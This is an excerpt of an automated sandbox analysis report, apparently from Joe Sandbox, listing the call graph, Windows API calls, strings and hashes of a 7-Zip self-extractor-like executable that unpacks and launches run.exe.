bb27ee 18956->18959 19381 bb264c 18956->19381 18957->18956 18957->18959 18958->18959 18960 bb184f 16 API calls 18958->18960 18961 bb2603 22 API calls 18958->18961 18959->18954 18960->18958 18961->18958 18963 bb69e8 18962->18963 18964 bb1759 16 API calls 18963->18964 18965 bb69fb 18964->18965 18966 bb16dc 16 API calls 18965->18966 18967 bb6a0f 18966->18967 19394 bb1b03 18967->19394 18969 bb6a20 18969->18910 18971 bb1729 18970->18971 18971->18971 18972 bb1533 16 API calls 18971->18972 18973 bb1736 18972->18973 18974 bc64f1 18973->18974 18975 bb17ef 16 API calls 18974->18975 18976 bc6519 18975->18976 18977 bb17ef 16 API calls 18976->18977 18978 bc6556 18977->18978 18979 bb3784 16 API calls 18978->18979 18980 bc655e 18979->18980 18980->18912 18982 bb4870 18981->18982 18983 bb16b8 16 API calls 18982->18983 18984 bb48a4 18983->18984 18985 bb16b8 16 API calls 18984->18985 18986 bb48ba 18985->18986 18987 bb16b8 16 API calls 18986->18987 18988 bb48c9 18987->18988 18988->18927 19046 bb3bc6 18989->19046 18991 bb2b9a 18992 bb1787 16 API calls 18991->18992 18993 bb2ba8 18991->18993 18992->18993 18994 bb1787 16 API calls 18993->18994 18995 bb2bc3 18994->18995 18996 bb4901 18995->18996 18997 bb490d 18996->18997 18998 bb17ef 16 API calls 18997->18998 18999 bb4936 18998->18999 19000 bb1614 16 API calls 18999->19000 19001 bb494c 19000->19001 19002 bb3138 55 API calls 19001->19002 19003 bb495c 19002->19003 19004 bb225e GetLastError 19003->19004 19005 bb4970 19003->19005 19004->19005 19005->18932 19017 bb5ea7 19006->19017 19008 bb63d5 19012 bb6bb6 VariantClear 19008->19012 19009 bb17ef 16 API calls 19009->19017 19010 bb5fcf 19010->19008 19011 bb63e0 19010->19011 19014 bb6037 19010->19014 19013 bb6bb6 VariantClear 19011->19013 19012->19011 19039 bb5ebd 19013->19039 19014->19011 19016 bb6043 19014->19016 19018 bb6bb6 VariantClear 19016->19018 19017->19009 19017->19010 19017->19039 19045 bb6219 19017->19045 19092 bb4afe 19017->19092 19104 bb5b53 19017->19104 19132 bb6672 19017->19132 
19023 bb6048 19018->19023 19022 bb17ef 16 API calls 19022->19039 19024 bb4afe 16 API calls 19023->19024 19023->19039 19025 bb60d3 19024->19025 19140 bb4d79 19025->19140 19027 bb60e7 19027->19039 19154 bb4ba4 19027->19154 19029 bb4a88 16 API calls 19030 bb6170 19029->19030 19032 bb17ef 16 API calls 19030->19032 19033 bb61b1 19032->19033 19158 bb5926 19033->19158 19039->18938 19045->19039 19201 bb58cb 19045->19201 19047 bb3bd2 19046->19047 19048 bb1787 16 API calls 19047->19048 19049 bb3be5 19048->19049 19050 bb3c4a 19049->19050 19055 bb3bf2 19049->19055 19051 bb16b8 16 API calls 19050->19051 19052 bb3c52 19051->19052 19053 bb3c6b 19052->19053 19054 bb3c63 19052->19054 19077 bb2ae0 19053->19077 19056 bb1787 16 API calls 19054->19056 19057 bb16dc 16 API calls 19055->19057 19061 bb3c00 19055->19061 19059 bb3c69 19056->19059 19062 bb3c10 19057->19062 19060 bb3784 16 API calls 19059->19060 19059->19061 19067 bb3c80 19060->19067 19061->18991 19062->19061 19063 bb19c5 16 API calls 19062->19063 19063->19061 19064 bb16b8 16 API calls 19065 bb3cf2 19064->19065 19066 bb3d25 19065->19066 19068 bb3d0c 19065->19068 19069 bb1787 16 API calls 19066->19069 19067->19061 19067->19064 19088 bb1981 19068->19088 19073 bb3d23 19069->19073 19071 bb3d18 19072 bb1981 16 API calls 19071->19072 19072->19073 19073->19061 19074 bb17ef 16 API calls 19073->19074 19075 bb3d5a 19074->19075 19076 bb19c5 16 API calls 19075->19076 19076->19061 19078 bb2aef __EH_prolog3_GS 19077->19078 19079 bb2b49 GetCurrentDirectoryW 19078->19079 19080 bb2b04 GetCurrentDirectoryA 19078->19080 19082 bb1787 16 API calls 19079->19082 19081 bb1bf7 20 API calls 19080->19081 19083 bb2b2f 19081->19083 19086 bb2b3b 19082->19086 19084 bb17ef 16 API calls 19083->19084 19084->19086 19085 bd9167 5 API calls 19087 bb2b87 19085->19087 19086->19085 19087->19059 19089 bb1993 19088->19089 19090 bb15aa 16 API calls 19089->19090 19091 bb19a0 __InternalCxxFrameHandler 19090->19091 19091->19071 19093 bb4b0a 19092->19093 19206 bb4abe 
19093->19206 19095 bb4b2b 19096 bb4abe 16 API calls 19095->19096 19097 bb4b37 19096->19097 19098 bb16b8 16 API calls 19097->19098 19099 bb4b43 19098->19099 19100 bb16b8 16 API calls 19099->19100 19101 bb4b4f 19100->19101 19102 bb16b8 16 API calls 19101->19102 19103 bb4b5e 19102->19103 19103->19017 19105 bb5b5f 19104->19105 19106 bb5ba8 19105->19106 19107 bb5b80 19105->19107 19109 bcc0bb 16 API calls 19106->19109 19119 bb5b87 19106->19119 19108 bcc0bb 16 API calls 19107->19108 19108->19119 19111 bb5bb8 19109->19111 19110 bb5926 41 API calls 19113 bb5c45 19110->19113 19112 bb17ef 16 API calls 19111->19112 19114 bb5be6 19112->19114 19115 bb5bf8 19113->19115 19217 bb465f 19113->19217 19212 bb46c1 19114->19212 19115->19017 19118 bb5bf3 19120 bb225e GetLastError 19118->19120 19119->19110 19120->19115 19122 bb1759 16 API calls 19130 bb5cbf 19122->19130 19123 bb12c1 16 API calls 19123->19130 19124 bb16b8 16 API calls 19124->19130 19125 bb19c5 16 API calls 19125->19130 19126 bb17ef 16 API calls 19126->19130 19127 bb1a00 16 API calls 19127->19130 19128 bb46c1 24 API calls 19128->19130 19129 bb3138 55 API calls 19129->19130 19130->19115 19130->19122 19130->19123 19130->19124 19130->19125 19130->19126 19130->19127 19130->19128 19130->19129 19131 bb5926 41 API calls 19130->19131 19131->19130 19133 bb667e 19132->19133 19134 bb1d74 16 API calls 19133->19134 19135 bb6685 19134->19135 19136 bcc0bb 16 API calls 19135->19136 19137 bb668f 19136->19137 19220 bb6766 19137->19220 19139 bb66a1 19139->19017 19145 bb4d85 19140->19145 19141 bb4dd9 19142 bb4e90 19141->19142 19144 bb4e5f 19141->19144 19146 bb4e53 19141->19146 19149 bb4e21 19141->19149 19143 bb6bb6 VariantClear 19142->19143 19143->19149 19144->19142 19148 bb4e5d 19144->19148 19145->19141 19150 bb14d7 16 API calls 19145->19150 19147 bb18ab 17 API calls 19146->19147 19147->19148 19151 bb6bb6 VariantClear 19148->19151 19149->19027 19150->19141 19152 bb4e7d 19151->19152 19152->19149 19238 bb4ea7 19152->19238 19155 bb4bc7 
19154->19155 19156 bb6bb6 VariantClear 19155->19156 19157 bb4be7 19156->19157 19157->19029 19157->19039 19159 bb5932 19158->19159 19254 bb52f0 19159->19254 19202 bb17ef 16 API calls 19201->19202 19203 bb5913 19202->19203 19204 bb17ef 16 API calls 19203->19204 19205 bb591f 19204->19205 19205->19022 19207 bb4aca 19206->19207 19208 bb16b8 16 API calls 19207->19208 19209 bb4aeb 19208->19209 19210 bb16b8 16 API calls 19209->19210 19211 bb4af6 19210->19211 19211->19095 19213 bb227e 23 API calls 19212->19213 19214 bb46f4 19213->19214 19215 bb4718 19214->19215 19216 bb4700 SetFileTime 19214->19216 19215->19118 19215->19119 19216->19215 19218 bb1533 16 API calls 19217->19218 19219 bb467b __InternalCxxFrameHandler 19218->19219 19219->19130 19221 bb6772 19220->19221 19232 bb6932 19221->19232 19223 bb67d4 19224 bb6932 16 API calls 19223->19224 19225 bb67e4 19224->19225 19226 bb1759 16 API calls 19225->19226 19227 bb67f4 19226->19227 19228 bb1759 16 API calls 19227->19228 19229 bb6804 19228->19229 19230 bb1759 16 API calls 19229->19230 19231 bb681a 19230->19231 19231->19139 19233 bb693e 19232->19233 19234 bb1759 16 API calls 19233->19234 19235 bb6986 19234->19235 19236 bb1759 16 API calls 19235->19236 19237 bb6996 19236->19237 19237->19223 19239 bb4eb3 19238->19239 19240 bb4ba4 VariantClear 19239->19240 19241 bb4ed3 19240->19241 19242 bb4f2e 19241->19242 19243 bb17ef 16 API calls 19241->19243 19242->19149 19244 bb4eea 19243->19244 19245 bb4f3f 19244->19245 19247 bb4f38 19244->19247 19248 bb4f13 19244->19248 19246 bb6bb6 VariantClear 19245->19246 19246->19242 19247->19245 19249 bb4f26 19247->19249 19250 bb12c1 16 API calls 19248->19250 19252 bb6bb6 VariantClear 19249->19252 19251 bb4f1c 19250->19251 19253 bb1981 16 API calls 19251->19253 19252->19242 19253->19249 19255 bb52fc 19254->19255 19382 bb2658 19381->19382 19383 bb2663 19382->19383 19384 bb2687 CreateDirectoryW 19382->19384 19386 bb1bb2 20 API calls 19383->19386 19385 bb2682 19384->19385 19387 bb2699 GetLastError 
19385->19387 19390 bb2695 19385->19390 19388 bb266d CreateDirectoryA 19386->19388 19389 bb26aa 19387->19389 19387->19390 19388->19385 19391 bb16b8 16 API calls 19389->19391 19390->18956 19392 bb26ba 19391->19392 19393 bb3138 55 API calls 19392->19393 19393->19390 19395 bb1b7c 19394->19395 19396 bb1b12 19394->19396 19395->18969 19396->19395 19398 bb1abd 19396->19398 19399 bb1acd 19398->19399 19401 bb1ad4 __InternalCxxFrameHandler 19398->19401 19401->19396 19402 bb71f4 19403 bb720b 19402->19403 19406 bb723a 19403->19406 19408 bb2434 WriteFile 19403->19408 19405 bb7259 19406->19405 19407 bb225e GetLastError 19406->19407 19407->19405 19408->19403 19409 bc092c 19410 bd0548 ___vcrt_freefls@4 14 API calls 19409->19410 19411 bc0935 19410->19411 19412 bc028f 19415 bc02ae 19412->19415 19414 bc0297 19416 bc030c 19415->19416 19417 bc0307 19415->19417 19416->19414 19419 bc0b04 19417->19419 19420 bc0b0e 19419->19420 19422 bc0b22 19420->19422 19423 bc4bad 19420->19423 19422->19416 19424 bc4bc2 19423->19424 19425 bc3d65 4 API calls 19424->19425 19426 bc4bd8 DeleteCriticalSection 19424->19426 19425->19424 19426->19422 19428 bb8bac 19429 bb8c13 19428->19429 19436 bb9333 19429->19436 19432 bb8c4f 19434 bcbe6f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 19432->19434 19435 bb8cff 19434->19435 19437 bb9350 19436->19437 19443 bb6f6f 6 API calls 19437->19443 19438 bb936e 19439 bb8c49 19438->19439 19444 bb6f6f 6 API calls 19438->19444 19439->19432 19446 bbb4f5 19439->19446 19440 bb9382 19440->19439 19445 bb6f6f 6 API calls 19440->19445 19441 bb9395 19441->19439 19453 bb9183 19441->19453 19443->19438 19444->19440 19445->19441 19447 bbb501 __EH_prolog3_catch 19446->19447 19473 bbb085 19447->19473 19449 bbb510 19450 bb8ebb RaiseException 19449->19450 19451 bbb524 19449->19451 19452 bbb556 19450->19452 19451->19432 19452->19432 19454 bb918f 19453->19454 19463 bbd921 19454->19463 19456 bb91a9 19457 bb91ca 19456->19457 19458 bcc081 16 API calls 19456->19458 19457->19439 
19459 bb91ef __InternalCxxFrameHandler 19458->19459 19459->19457 19460 bb92de __InternalCxxFrameHandler 19459->19460 19467 bb6ea6 19459->19467 19462 bb6f6f 6 API calls 19460->19462 19462->19457 19464 bbd934 19463->19464 19465 bbd962 19464->19465 19466 bb6ea6 2 API calls 19464->19466 19465->19456 19466->19464 19472 bb2407 ReadFile 19467->19472 19469 bb6eca 19470 bb6ede GetLastError 19469->19470 19471 bb6eda 19469->19471 19470->19471 19471->19459 19472->19469 19474 bbb091 19473->19474 19497 bbb153 19474->19497 19501 bb6f6f 6 API calls 19474->19501 19475 bbb218 19476 bcc081 16 API calls 19475->19476 19475->19497 19477 bbb22d 19476->19477 19478 bbd921 2 API calls 19477->19478 19479 bbb249 19478->19479 19480 bbb4ef 19479->19480 19479->19497 19502 bb8f15 19479->19502 19481 bb8eb6 RaiseException 19480->19481 19485 bbb4f4 __EH_prolog3_catch 19481->19485 19483 bbb2ab 19484 bb90dc RaiseException 19483->19484 19490 bbb2c4 19484->19490 19486 bbb085 64 API calls 19485->19486 19487 bbb510 19486->19487 19492 bb8ebb RaiseException 19487->19492 19493 bbb524 19487->19493 19488 bbb448 19531 bba886 19488->19531 19490->19480 19490->19488 19517 bba5ba 19490->19517 19499 bbb556 19492->19499 19493->19449 19494 bb8f15 RaiseException 19496 bbb42d 19494->19496 19495 bbb302 19495->19480 19495->19494 19495->19497 19498 bb90dc RaiseException 19496->19498 19497->19449 19500 bbb435 19498->19500 19499->19449 19500->19480 19500->19488 19501->19475 19503 bb8f1e 19502->19503 19504 bb8f2c 19503->19504 19505 bb8eb6 RaiseException 19503->19505 19504->19483 19506 bb8f63 19505->19506 19507 bb8fb3 RaiseException 19506->19507 19508 bb8f7a 19507->19508 19509 bb8fa7 19508->19509 19510 bb8fad 19508->19510 19511 bb911d RaiseException 19508->19511 19509->19483 19512 bb8eb6 RaiseException 19510->19512 19514 bb8f8e 19511->19514 19513 bb8fb2 19512->19513 19514->19510 19515 bb8f93 19514->19515 19516 bb8f15 RaiseException 19515->19516 19516->19509 19518 bba5f4 19517->19518 19585 bba2e2 19518->19585 19520 bb1d74 16 
API calls 19526 bba62e 19520->19526 19521 bcc0bb 16 API calls 19521->19526 19522 bba80d 19523 bb8ebb RaiseException 19522->19523 19525 bba812 19523->19525 19524 bb3e6b 16 API calls 19524->19526 19527 bb8eb6 RaiseException 19525->19527 19526->19520 19526->19521 19526->19522 19526->19524 19526->19525 19529 bba774 19526->19529 19530 bbcb09 62 API calls 19526->19530 19528 bba817 19527->19528 19528->19495 19529->19495 19530->19526 19532 bb90dc RaiseException 19531->19532 19533 bba8c0 19532->19533 19534 bba8e2 19533->19534 19732 bb93c7 19533->19732 19535 bba982 19534->19535 19538 bba5ba 62 API calls 19534->19538 19536 bba9e8 19535->19536 19542 bba2e2 16 API calls 19535->19542 19545 bb911d RaiseException 19536->19545 19579 bbadfc 19536->19579 19541 bba92e 19538->19541 19546 bb90dc RaiseException 19541->19546 19563 bba935 19541->19563 19544 bba9cf 19542->19544 19543 bb90dc RaiseException 19543->19534 19547 bb90dc RaiseException 19544->19547 19548 bbaa0a 19545->19548 19546->19535 19547->19536 19549 bb78aa 16 API calls 19548->19549 19550 bbaa1f 19549->19550 19551 bb78aa 16 API calls 19550->19551 19552 bbaa2f 19551->19552 19553 bbaa49 19552->19553 19555 bb78aa 16 API calls 19552->19555 19554 bb90dc RaiseException 19553->19554 19584 bbaa75 19554->19584 19555->19553 19556 bbadb0 19557 bb90dc RaiseException 19556->19557 19558 bbadb8 19557->19558 19559 bbaf85 19558->19559 19568 bbadcf 19558->19568 19561 bb8ebb RaiseException 19559->19561 19560 bbaf8f 19562 bb8eb6 RaiseException 19560->19562 19564 bbaf8a 19561->19564 19565 bbaf94 19562->19565 19563->19497 19567 bb8eb6 RaiseException 19564->19567 19566 bb8f15 RaiseException 19566->19584 19567->19560 19569 bbadf1 19568->19569 19571 bbb6cd 16 API calls 19568->19571 19770 bbb594 19569->19770 19571->19569 19572 bb90dc RaiseException 19572->19584 19573 bba491 16 API calls 19573->19584 19574 bba448 16 API calls 19574->19584 19576 bb8f64 RaiseException 19576->19584 19577 bb3e6b 16 API calls 19577->19584 19578 bb8fb3 RaiseException 
19578->19584 19778 bbafc6 19579->19778 19580 bb78aa 16 API calls 19580->19584 19582 bb8fcb RaiseException 19582->19584 19583 bbb5f9 16 API calls 19583->19584 19584->19556 19584->19560 19584->19564 19584->19566 19584->19572 19584->19573 19584->19574 19584->19576 19584->19577 19584->19578 19584->19580 19584->19582 19584->19583 19737 bb9797 19584->19737 19759 bba4d9 19584->19759 19586 bb90dc RaiseException 19585->19586 19587 bba2f8 19586->19587 19588 bba370 19587->19588 19589 bb90dc RaiseException 19587->19589 19591 bba396 19588->19591 19610 bb991c 19588->19610 19607 bba313 19589->19607 19601 bba3ba 19591->19601 19627 bbb626 19591->19627 19592 bba3ef 19686 bbb5f9 19592->19686 19593 bba3d5 19631 bb9ede 19593->19631 19596 bba3eb 19602 bb8eb6 RaiseException 19596->19602 19608 bba439 19596->19608 19600 bba3fd 19600->19596 19690 bb78aa 19600->19690 19601->19592 19601->19593 19603 bba447 19602->19603 19604 bba3e3 19605 bb90dc RaiseException 19604->19605 19605->19596 19607->19596 19609 bb90dc RaiseException 19607->19609 19608->19526 19609->19588 19611 bb9928 19610->19611 19612 bb911d RaiseException 19611->19612 19613 bb993f 19612->19613 19693 bb8f64 19613->19693 19616 bbb5f9 16 API calls 19617 bb997a 19616->19617 19618 bcc081 16 API calls 19617->19618 19619 bb998f 19618->19619 19620 bbb5f9 16 API calls 19619->19620 19621 bb99a1 19620->19621 19622 bbb5f9 16 API calls 19621->19622 19624 bb99af __InternalCxxFrameHandler 19622->19624 19623 bb8fb3 RaiseException 19623->19624 19624->19623 19626 bb911d RaiseException 19624->19626 19705 bb7952 19624->19705 19626->19624 19628 bbb630 19627->19628 19629 bcc081 16 API calls 19628->19629 19630 bbb64b 19629->19630 19630->19601 19632 bb9eea 19631->19632 19633 bbb5f9 16 API calls 19632->19633 19638 bb9efd 19633->19638 19634 bb90dc RaiseException 19634->19638 19635 bb9f6e 19636 bba140 19635->19636 19640 bb9f82 19635->19640 19639 bba14d 19636->19639 19654 bba05a 19636->19654 19637 bb911d RaiseException 19637->19638 19638->19634 19638->19635 
19638->19637 19713 bb8e52 19638->19713 19645 bb78aa 16 API calls 19639->19645 19646 bba189 19639->19646 19642 bba04f 19640->19642 19650 bb90dc RaiseException 19640->19650 19658 bb78aa 16 API calls 19640->19658 19644 bb90dc RaiseException 19642->19644 19643 bba236 19648 bbb6cd 16 API calls 19643->19648 19652 bba25e 19643->19652 19644->19654 19645->19639 19646->19604 19647 bb8e52 RaiseException 19647->19654 19651 bba250 19648->19651 19650->19640 19655 bbb787 16 API calls 19651->19655 19652->19604 19653 bb90dc RaiseException 19653->19654 19654->19643 19654->19647 19654->19653 19656 bbb6cd 16 API calls 19654->19656 19657 bbb787 16 API calls 19654->19657 19659 bba2dc 19654->19659 19719 bba491 19654->19719 19655->19652 19656->19654 19657->19654 19658->19640 19660 bb8eb6 RaiseException 19659->19660 19661 bba2e1 19660->19661 19662 bb90dc RaiseException 19661->19662 19663 bba2f8 19662->19663 19664 bba370 19663->19664 19666 bb90dc RaiseException 19663->19666 19665 bba396 19664->19665 19668 bb991c 16 API calls 19664->19668 19667 bba3ba 19665->19667 19674 bbb626 16 API calls 19665->19674 19681 bba313 19666->19681 19669 bba3ef 19667->19669 19670 bba3d5 19667->19670 19671 bba38e 19668->19671 19672 bbb5f9 16 API calls 19669->19672 19675 bb9ede 16 API calls 19670->19675 19676 bb90dc RaiseException 19671->19676 19677 bba3fd 19672->19677 19673 bba3eb 19678 bb8eb6 RaiseException 19673->19678 19684 bba439 19673->19684 19674->19667 19680 bba3e3 19675->19680 19676->19665 19677->19673 19683 bb78aa 16 API calls 19677->19683 19679 bba447 19678->19679 19682 bb90dc RaiseException 19680->19682 19681->19673 19685 bb90dc RaiseException 19681->19685 19682->19673 19683->19677 19684->19604 19685->19664 19687 bbb603 19686->19687 19688 bcc081 16 API calls 19687->19688 19689 bbb61e 19688->19689 19689->19600 19691 bb7952 16 API calls 19690->19691 19692 bb78b3 19691->19692 19692->19600 19694 bb8f6e 19693->19694 19695 bb8fb3 RaiseException 19694->19695 19696 bb8f7a 19695->19696 19697 bb8fa7 19696->19697 
19698 bb8fad 19696->19698 19699 bb911d RaiseException 19696->19699 19697->19616 19700 bb8eb6 RaiseException 19698->19700 19702 bb8f8e 19699->19702 19701 bb8fb2 19700->19701 19702->19698 19703 bb8f93 19702->19703 19704 bb8f15 RaiseException 19703->19704 19704->19697 19706 bb7961 19705->19706 19712 bb7991 __InternalCxxFrameHandler 19705->19712 19707 bb79bc 19706->19707 19708 bb796c 19706->19708 19709 bceddc CallUnexpected RaiseException 19707->19709 19710 bcc081 16 API calls 19708->19710 19711 bb79d1 19709->19711 19710->19712 19712->19624 19714 bb90dc RaiseException 19713->19714 19715 bb8e5f 19714->19715 19716 bb8e71 19715->19716 19717 bb8eb6 RaiseException 19715->19717 19716->19638 19718 bb8e7f 19717->19718 19720 bb8fb3 RaiseException 19719->19720 19721 bba49f 19720->19721 19722 bba4a3 19721->19722 19723 bba4b2 19721->19723 19727 bba448 19722->19727 19725 bbb6cd 16 API calls 19723->19725 19726 bba4b0 IsInExceptionSpec 19725->19726 19726->19654 19728 bbb6cd 16 API calls 19727->19728 19730 bba45c 19728->19730 19729 bba48b 19729->19726 19730->19729 19731 bb8fb3 RaiseException 19730->19731 19731->19730 19733 bb93d3 19732->19733 19734 bb90dc RaiseException 19733->19734 19735 bb93e6 19733->19735 19736 bb8e52 RaiseException 19733->19736 19734->19733 19735->19543 19736->19733 19738 bbb787 16 API calls 19737->19738 19740 bb97b0 19738->19740 19739 bb97ed 19739->19584 19740->19739 19741 bb8eb6 RaiseException 19740->19741 19742 bb97fa 19741->19742 19743 bb911d RaiseException 19742->19743 19744 bb9811 19743->19744 19745 bbb626 16 API calls 19744->19745 19750 bb9832 19745->19750 19746 bb988e 19747 bb90dc RaiseException 19746->19747 19758 bb98a2 19747->19758 19748 bb90dc RaiseException 19748->19750 19749 bb990e 19749->19584 19750->19746 19750->19748 19751 bb9916 19750->19751 19752 bb8eb6 RaiseException 19751->19752 19755 bb991b 19752->19755 19753 bb8e52 RaiseException 19753->19758 19754 bba491 16 API calls 19754->19758 19756 bb90dc RaiseException 19756->19758 19757 bb9797 16 API 

Control-flow Graph

[Figure: control-flow graph of the function at bcb658; legend: Executed, Not Executed]
APIs
• __EH_prolog3_GS.LIBCMT ref: 00BCB662
• GetVersionExA.KERNEL32 ref: 00BCB680
• CreateThread.KERNELBASE(00000000,00000000,00BC6C19,00000000,00000000,00000000), ref: 00BCB6B2
• GetCommandLineW.KERNEL32 ref: 00BCB6EA
• MessageBoxW.USER32(00000000,Cannot create temp folder archive,7-Zip,00000010), ref: 00BCB8A9
  • Part of subcall function 00BB2C84: __EH_prolog3_GS.LIBCMT ref: 00BB2C8B
  • Part of subcall function 00BB2C84: GetCurrentThreadId.KERNEL32 ref: 00BB2C99
  • Part of subcall function 00BB2C84: GetTickCount.KERNEL32 ref: 00BB2CA4
  • Part of subcall function 00BB2C84: GetCurrentProcessId.KERNEL32 ref: 00BB2CB1
  • Part of subcall function 00BB2C84: GetTickCount.KERNEL32 ref: 00BB2D02
  • Part of subcall function 00BB2C84: SetLastError.KERNEL32(000000B7,00000000,00000000), ref: 00BB2D4E
• MessageBoxW.USER32(00000000,Cannot load codecs,7-Zip,00000010), ref: 00BCB901
• MessageBoxW.USER32(00000000,?,Extraction Failed,00000010), ref: 00BCB9F3
• ShellExecuteExA.SHELL32(-00000172,00000000), ref: 00BCBAF8
• MessageBoxW.USER32(00000000,Cannot open file,7-Zip,00000010), ref: 00BCBB1E
• MessageBoxW.USER32(00000000,Cannot find run.exe,7-Zip,00000010), ref: 00BCBB82
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,-000001CE,-00000182,00000000,?,?,?), ref: 00BCBCEC
• CloseHandle.KERNEL32(?), ref: 00BCBD31
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BCBD62
• CloseHandle.KERNEL32(?), ref: 00BCBD65
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BCBD74
• CloseHandle.KERNEL32(?), ref: 00BCBD77
Strings
Memory Dump Source
• Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
Similarity
• API ID: Message$CloseHandle$CountCreateCurrentH_prolog3_ObjectProcessSingleThreadTickWait$CommandErrorExecuteLastLineShellVersion
• String ID: %%T$%%T\$7-Zip$Cannot create temp folder archive$Cannot find run.exe$Cannot load codecs$Cannot open file$Extraction Failed$File is corrupt$run.exe
• API String ID: 3057246094-981852518
• Opcode ID: 2bd4ddd575073586cdac34ad28870cff24f4a14554afbb24362db7c6b6243309
• Instruction ID: beecaa5c4885897f12dbb59527989e08e4e23e323d1f8a40dacedcc3cc62c0b7
• Opcode Fuzzy Hash: 2bd4ddd575073586cdac34ad28870cff24f4a14554afbb24362db7c6b6243309
• Instruction Fuzzy Hash: BA123871900269DBEB25AB60DC62FEDB7F5AF15300F5085EEE10A761A1DBB01E84CF51
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Figure: control-flow graph of the function at bb805b; legend: Executed, Not Executed]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00BB8074
                                                                                                                                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00BB807B
                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 00BB80A9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$AffinityCurrentInfoMaskSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3251479945-0
                                                                                                                                                                                                              • Opcode ID: 5c135a51437a9deed507c88f27bdf60154c9b66323efaecc755e70547962ff37
                                                                                                                                                                                                              • Instruction ID: 3ed629ed5cb09c3fe657875f962813d0041da5c9bd7a6a1f21b07a59a0697138
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c135a51437a9deed507c88f27bdf60154c9b66323efaecc755e70547962ff37
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A53184B16057459FC724DF6AD885567FBE9FB88300B504A2EE49AC3700EB70E908CB51
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?,00BD0F90,?,?,?,?), ref: 00BD0FB3
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,00BD0F90,?,?,?,?), ref: 00BD0FBA
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00BD0FCC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                              • Opcode ID: 0aa1c7d4f66ac740009b8889dbf41c13e782d3276a490692bf0d5b0d45ac1680
                                                                                                                                                                                                              • Instruction ID: 9e7480f295b8d42ef0492cf17b338380f1c8bd774f95a61ac4dcde9900ea86eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0aa1c7d4f66ac740009b8889dbf41c13e782d3276a490692bf0d5b0d45ac1680
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4E04635022148EFCF213B14CC69E59BBB8FB40341F11445AF80496631EF36EC82CA90
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BB2EDD: FindClose.KERNEL32(0000002A,0000002A,00BB2F26,?,?,00000001), ref: 00BB2EE7
                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,?,?,00000001), ref: 00BB2F6F
                                                                                                                                                                                                                • Part of subcall function 00BB1BB2: AreFileApisANSI.KERNEL32(?,00000010,00BB2F3E,?,?,00000001), ref: 00BB1BD0
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,?,?,00000001), ref: 00BB2F45
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
